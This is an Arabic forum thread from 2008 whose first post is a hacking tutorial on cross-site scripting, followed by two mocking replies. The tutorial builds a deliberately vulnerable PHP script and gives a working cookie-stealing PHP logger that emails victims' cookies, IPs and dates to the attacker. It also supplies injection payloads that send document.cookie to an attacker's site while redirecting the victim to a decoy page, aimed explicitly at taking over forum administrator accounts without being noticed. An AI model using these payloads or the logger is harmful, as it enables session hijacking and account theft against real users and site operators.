المكتب البحث التسجيل أتصل بنا تسجيل الخروج
التسجيل التعليمات قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل جميع المنتديات مقروءة
 

مشـاري : اقول ولد الكويت انت اختصاصك جرجير وبصل وثوم لن وجهك يدل على كذا فديت كرشتك الي كلها تونه جـيـت بـظـروفـي : يالله عاااااااشو عااااااشو يالله عاشو ورى سرى يالله مرحبا بكم في قسم الالعاب دعاء : يامحلى هالصباح بكل المتواجدين حاليا وبكل من يأتي بعدنا.. مساحات ود وصفاء من نبض وشريان دعاء دعاء : الحمدلله الذي احيانا بعد أن أماتنا وإليه النشور. الحمدلله رب العالمين.. صباحكم نقاء وعطاء رهين الدموع : آخر الأخبار : "إسلاميون يطالبون برقابة صارمة على تحركات "مهند ونور" بالبحرين" ،، تعميم رسمي يحرم "العروض الخارقة" خلال الاحتفالات بالسعودية مشاعل البندري : !@ولد@الكويت@! : مشاري انا اختصاص مشويات وذبايح البيض والفلافل علي اختي العزيزه دافي والله ماضنيت تفحل وجه مصبح مايربح نـــــــو ا ل : ساعدوو سكره ماسنجرها يكتب مقلوب وخربان وماقدر اكلمها الحين بليزز النجده حق سكر زيادة مشـاري : حيااكم في قسم منتدى الرسل والصحابة (قصة للرسول (صلى الله عليه وسلم ) تهز المشاعر وتدمع لها العين ) آورآق آلصبر : مسآء آلخير جميعآ.. آللهم زد من يحبني جنونآ بي.. وآمنح من يكرهني نعمه آلعقل.. مشـاري : ولد للكويت اذا تعرف تطبخ اطبخ لي بيض محروق ابي انزله في المسابقة يمكن افووز شلابيخوا : lمستاااااااااااانسه ماني مصدقه وصلت1000 مسااااااااااااااااء الخير عليكم جميعا عبير البدره : جديد العام - صور سقوط المروحة على شابين سعوديين في جسر البحرين مشـاعـل الخـالـد : ـالهنوفـ Mohammed بهاء الدين احمد ثلاثة اعضاء تحت التصويت . بانتظار ترشيحاتكم في عضو في عيون الاعضاء المنتدى العام نووووور : العضو الأكثر نشاطأ في المنتدى لهذا اليوم : نووووور وااااااااااااو وناسه نووووور : درس اليوم (( لا تعمل شيئا لا تعلم عواقبه )) مشـاري : هيبه طل شايفتني حواج ولا شايل الشنطه ودور على لبيوت ابيع خلاقين :( &البنـــدري& : وشفيه بومشعان تصيرلك هيبه هههههههه أمحق هيبه بإسم مشـاري : امحق نور يوم فيها ابو مشعان قولي ابو خالد اذرب اشوي هههههههههه &البنـــدري& : يامرحبا يامشاري النور نورك يابومشعان وعاشت أيامك لك وحشه والله أنت ومشاعل والشله
العودة  

منتديات الخليج العربية > منتديات تقنية > الكمبيوتر و الانترنت


الكمبيوتر و الانترنت برامج الكمبيوتر والإنترنت .. محادثات .. ماسنجر .. ياهو .. هوتميل .. وكل ملحقاتها.. مشاكل وحلول


موضوع مغلق
 
LinkBack أدوات الموضوع طرق مشاهدة الموضوع
قديم 03-30-2008, 08:47 PM   #1
°·.·° KUWAITY ¤ M5RBHA °·.·°
مراقب منتديات الجوال
 
الصورة الرمزية °·.·° KUWAITY ¤ M5RBHA °·.·°






°·.·° KUWAITY ¤ M5RBHA °·.·° غير متواجد حالياً

°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***°·.·° KUWAITY ¤ M5RBHA °·.·° *** عضو فوق عالي الهمم ***


افتراضي أإأختــرأإأقـ -_- أإأختــرأإأقـ الجزء الاول

الشرح المفصل لاكتشاف ثغرات ال xss و تطبيقها و الحماية منها

السلام عليكم ورحمة الله تعالى وبركاته
اقدم لكم هذا الدرس كهدية مني لكل من يريد احتراف الاختراق و سلوك درب المعلمين الكبار
و هو اهداء خاص لكم
1- ماهي ثغرات ال xss :
اولا و قبل كل شيئ يجب معرفة ان هذا النوع من الثغرات يختلف عن الانواع الاخرى مثل sql و rfi
او الريموت فايل انكلود و ذلك في انها لا تطبق على الموقع او السيرفر بل تطبق على الاشخاص ...
فيجب على الضحية المساهمة لانجاح هذه الثغرة و ذلك بالذهاب الى الصفحة الملغمة التي تقوم بسرقة
معلومات مهمة من الكوكيز الخاص بالضحية .
فهي تسمح لك بتنفيذ أكواد الجافا سكربت وال HTML في متصفح الضحيه.
2- كيف تحدث ثغرات ال xss :
اغلب الثغرات سببها خطاء برمجي.. فهذه تنشاء بسبب خطاء برمجي سببه وضع فورم ادخال : كمربع
بحث او مربع وضع الردود في المنتديات .... الخ من فورمات الادخال ولكن الخطاء هو ان هذا الفورم
هو انه يعرض النتائج من غير تشفيرها .
ساشرح ذلك بمثال :
لدينا خطاء في هذا السكربت
كود PHP:
<?
$k 
$_GET[M5RBHA];
echo 
$k ;
?>
فهو كما شرحنا سابقا ياخذ قيمة M-5RBHA يخزنها ب k و ذلك بواسطة الامر GET
ثم يقوم بعرضها على المتصفح بواسطة الامر echo
و لتطبيق العمل على هذ السكربت يجب عليكم تثبيب سيرفر خاص
تركيب سيرفر خاص
نقصد بتركيب سيرفر خاص تحويل جهازك الشخصي الى موقع استضافه تستطيع من خلاله تجربة برامجك و سكربتاتك
قبل و ضعها على الانترنت .. و تركيب السيرفر امر في غاية السهولة وماعليك الا اتباع هذه الخطوات :
- تحميل برنامج سيرفر في جهازك وليكن PHPTriad 2.0 المجاني والذي انا استعمله و افضله على البرامج الاخرى
- ثبثه بصورة عادية و ليكن التثبيث مثلا في الC
- الان و بعد التثبيث بنجاح ما عليك الا الدخول الى ال C ثم الى المجلد apache لتجد الايقونة التي بالصورة

-و عند الضغط على ايقونة الاباتشي يبدأ السيرفر المحلي او الخاص بالعمل و تستطيعون التاكد من ذلك بعد
ان تاتيكم الصورة التالية ...
- و هي تعني ان السيرفر يعمل بشكل سليم
انا الان لن افصل في استخدام ال php لان له استخدام واسع جدا في برمجة ال php ;ال قواعد البيانات من نوع
sql و تستطيعون البحث عن كتاب تعرف على الphp و ال sql الذي هو من تاليف صقر بن محمد العنزي .
كما قلنا بعد تشغيل السيرفر نستيطيع وضع سكربتنا في مجلد htdocs حيث نحرره باستخدم الnote bloc
مثلا و نحفظه باسم prog.php كالتالي :


فنجده هنا

- و لفتح سكربتنا نضع في المتصفح ما يلي :
كود PHP:
http://127.0.0.1/prog.php 

كما في الصورة
لا تندهش عندما لا يخرج لك شيء لان سكربتنا لا يعرض اي شئ

الان جاء وقت تنيفيذ ثغرتنا .. اولا هاهو السكربت
كود PHP:
<?
$k 
$_GET[M5RBHA];
echo 
$k ;
?>
تامل جيدا المتغير M5RBHA لانه مسبوق بعلامة $ هذا هو سر الثغرة حيث القيمة المعطاة له يتم وضعها
بالمتغير k و الذي تتطم طباعته ... اذا ماذا لو غيلانا قيمة M5RBHA كالتالي ...
نقوم بوضع في متصفحنا ما يلي :
كود PHP:
http://127.0.0.1/prog.php?k9999=hello 

حيث حددنا قيمه للمتغير M5RBHA و التي هي عبارة عن نص hello
سيكون الناتج مايلي لاحظ الصورة جيدا
:

سنرى أننا جعلنا الطباعه من دون أي تشفير أي يستقبل من ثم يطبع من دون أن يشفر النتائج
الان ماذا لو ادخلنا نص بلغة الhtml
نص يقوم بتغير الكتابة الى bold و الكتابة الثخينة كما يلي
:
كود PHP:
http://127.0.0.1/prog.php?k9999=<b>hello</b> 


نلاحظ اننا نجحنا بذلك
ماذا لو اردنا وضع رابط :
كود PHP:
http://127.0.0.1/prog.php?k9999=<a%20href=www.site.com>hello</a> 

لكن ماذا لو جربنا اكواد الجافا سكريبت ...
سنجرب كود يقوم بعرض رسالة بها رقم هذه السنة 2008
كود PHP:
http://127.0.0.1/prog.php?k9999=<script>alert(2008);</script> 
الان
ما علينا الا وضع سكربت يعرض الكوكيز كهذا السكربت الذي اقول لكم انه لن يعرض شئ
لان سكربنتا لا يقوم بوضع ****** لكن العملية تنجح في المواقع او المنتديات المصابة
حيث اغلبها تقوم بوضوع ******s في جهازك لتسهيل عملية التصفح
و سكربت عرض الكوكيز تبعنا هو
كود PHP:
http://127.0.0.1/prog.php?k9999=<script>alert(********.c-o-o-k-i-e)</script> 
قم بنزع "-" بين كلمة كوكي
لو كان السكربت مطورا لوظع كوكيز لكانت النتيجة كالتالي
و
تلاحظ اننا طبقنا الثغرة على انفسنا و عرضنا الكوكيز الخاص بنا
لكننا كمخترقين ماذا نستفيد من هذه العملية
اقول لكم ماذا لو حصلنا على كوكيز الادمن مثلا لمنتدي القراصنة العرب مثلا
اذا حصل احدنا على هذا الكوكيز يستطيع الدخول على انه الادمن و يغير بمنتدانا هذا كما شاء
اذا فهي ثغرة خطيرة جدا ...
كيفية استغلال ثغرات الxss :
تتم الاستفادة من هذه الثغرة كالتالي :
- سوف نربط الكود باللوج
لكن ماهو اللوج log
اللوج هو ايضا سكربت مكتوب بلغة php و تضعه في موقعك الخاص مثلا في المواقع التي تسمح باستضافة المواقع
مجانا مثل
كود PHP:
www.membres.lycos.fr 
وغيرها من المواقع .
وهذا لوج :
كود PHP:
<?php
/* by  :_/\_: xp10 :_/\_: v1.0 *** k-9999 ***
/**************************************/
/******** قم بتغير معلواتك من أسفل هذا الخط **********/
/************************************/
$YourMail "k--9999@hotmail.com"// <== Your E-mail
/*-----------------------*/
if(isset($_GET['index'])){
$****** = 
$_GET['index'];
$redirect "http://www.google.com"# <== Edit
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
echo 
'<script>********.location="'.$redirect.'"</script>';
}
else print 
'
<title> k-9999 </title>
<body bgcolor="000000">
<center>
<b><font color="white">404</font></b><br>
<img src="http://www.google.com/"></center>
'
;
//**************************************//
//******** لاتقم بتغيررر أي شي من أسفل هذا الخط ********//
//************************************//
$Msg =
"
hi Mr hacker  ,,, www.xp10.com >>
[ "
.$ip." ] = أي بي الضحيه
[ "
.$date." ]= وقت دخول ضحيتك
[ hotmail-******s < By k-9999 >]
-----------------------------------------------
:: هذا كوكيز أحد ضحاياك ياهكر ::
"
.$******."
"
;
/* ------------------------------------------------------------------------- */
$Send mail($YourMail," New-******",$******,$Msg);
/*****************************************************************************/
if($Send){
if(
$redirect <> ""){header("location:".$redirect);}
}
?>
اشكر اخي العزيز 00-devil لبرمجته هذا اللوج ---
ما عليك الا حفظه بعد تتغير الايمايل الى ايمايلك ووضعه بموقعك تحت اسم log.php
و ربط السكربت الذي ياتي بالكوكيز مع اللوج يكون كالتالي
كود PHP:
<Script>location.href="http://www.xxxxx.com/log.php?id="+********.******</Script> 
--- حيث :
www.xxxxx.com موقعك الخاص او المجاني الذي و ضعت به ملف الكوكيز .
لكن اذا اردت سرقة كلمة مرور المدير لمنتدى abc وهو منتدي وهمي طبعا *للشرح فقط*
الذي وجدت بمنتداه ثغرة xss كالتالي :
كود PHP:
www.abc.com/vb/forums/index.php?act=<script>alert(********.c-o-o-k-i-e)</script> 
وو ضعت له الرابط :
كود PHP:
www.abc.com/vb/forums/index.php?act=<Script>location.href="http://www.xxxxx.com/log.php?id="+********.******</Script> 
سياخذه مباشره الى صفحة اللوج حقك !!!!!
لذا يجب علينا تفادي هذه المشكلة وذلك بربطه بموقع للتمويه www.google.com
لكن انا اقول عند التنفيد خلي موقع التمويه يكون صفحة من صفحات او قسم من اقسام المنتدىىآ ..
حتي لا ينكشف امرنا :-)
كود PHP:
www.abc.com/vb/forums/index.php?act=<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+********.******</Script> 
حين يضغط المدير على اللنك ياخذه المتصفح الى صفحة google و ذلك بعد ان ينسخ الكوكيز تبعه ويحفظه في اللوج
تبعك و بهذا ادخل الى اللوج او الى الايمايل و ستجد معلومات الكوكيز تبع المدير .
قم بنسخها في الكوكيز الخاص بك طبعا كعضو في منتدي abc بطريقة يدوية او باستعمال برامج مثل
برنامج ****** editor
او تقوم مباشرة بفك كلمة السر المشفره التي تجدها بالكوكي
ومبروك عليك .
انتظروا كيفية الحماية من هذه الثغرة بالجزء الثاني انشاء الله
__________________
من مواضيع °·.·° KUWAITY ¤ M5RBHA °·.·° مسجات بمناسبه العيد|اجازهـ|مسجات طازجة|فــلآش مـؤثـر|-*- ( *-* ) -*-|.::][ دستور قسم تحميل البرامج و الشرح ][::.|قبل المشاركة وكتابة أي موضوع تفضل هنــا|.::][ دستور قسم رسائل جوال و مسجات ][::.|.::][الدستور في قسم برامج الجوال ][::.|.::][الدستور في قسم الثيمات][::.|قوانين قسم مقاطع بلوتوث ونغمات للأهميــه|قصيده لنـاصـر الفـراعنــه بالهنـــدى : )|لقطات مضحكه من شاعر المليون|لما يحرم على الرجال مصافحه النساء|عـجـآيبـ آم آلـدنـيــآ : )|شرح طريقة نقل وتنصيب وتثبيت البرامج والألعاب|اكواد وكلمات سرية لجوالات نوكيا|توبكات رووووعة للماسنجر بلس|رسائل شعر مميزه للمميزين|لماذا حـرم الإسـلام زواج الإخـوة مـن بالرضاعة|
°·.·° KUWAITY ¤ M5RBHA °·.·° غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 04-03-2008, 06:38 PM   #2
 
الصورة الرمزية ملــ الجن ــك






ملــ الجن ــك غير متواجد حالياً

ملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداع


افتراضي

السلام عليكم ورحمة الله وبركاته


ما بقي غيرك يا وجه العنز تحكي بالإختراق

طيب بقولك بحولك ما تبي من دينارات لو خبرتني شئ واحد

ما هو المعني الكامل لهالكلمة


xss


هذه انت كاتبها بأول الموضوع وهي اختصار لعدة كلمات

قول وش هي



يا نتل


تحياتي يا نتل يا صوت العنز
__________________














من مواضيع ملــ الجن ــك كل عام وأنتم بخير|الـــــــغـــــــــــــــدر|السلام علي من اتبع الهدى ودين الحق|
ملــ الجن ــك غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 04-03-2008, 06:39 PM   #3
 
الصورة الرمزية ملــ الجن ــك






ملــ الجن ــك غير متواجد حالياً

ملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداعملــ الجن ــك عضو متجه نحو الابداع


افتراضي

وهذه بعد


بالكوكي



هذه اختصار للكوكيز

تقدر تقوللي وش بيكون الكوكيز هذا
__________________














من مواضيع ملــ الجن ــك كل عام وأنتم بخير|الـــــــغـــــــــــــــدر|السلام علي من اتبع الهدى ودين الحق|
ملــ الجن ــك غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
موضوع مغلق



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة
الانتقال السريع إلى

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
سوق واقف والسياحه الجزء الاول الأيام منتدى صور الاعضاء بالخارج 20 اليوم 08:58 AM
100 برنامج للجيل الثالث الجزء الاول العمري 2008 برامج الجوال 12 07-26-2008 07:18 PM
لعبة BMW M3 Challenge محمود الرياني منتدى الألعاب الكاملة - تحميل العاب 3 07-17-2008 03:16 AM
Fifa 2008 كاملة بحجم 670 ميجا تحميل مباشر علي محمود الرياني منتدى الألعاب الكاملة - تحميل العاب 2 06-30-2008 07:45 PM
عمل البوم للصور الجزء الاول الدرس السابع الأيام سبيسات و مدونات 2 03-08-2008 07:26 AM

جميع الأوقات بتوقيت GMT +3. الساعة الآن 01:21 PM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
منتديات الخليج العربية لاتنتمي الى شخص بل نحن من ينتمي اليها

دردشة ا دردشه ا دردشة صوتية ا دردشة كتابية


LinkBacks Enabled by vBSEO 3.1.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68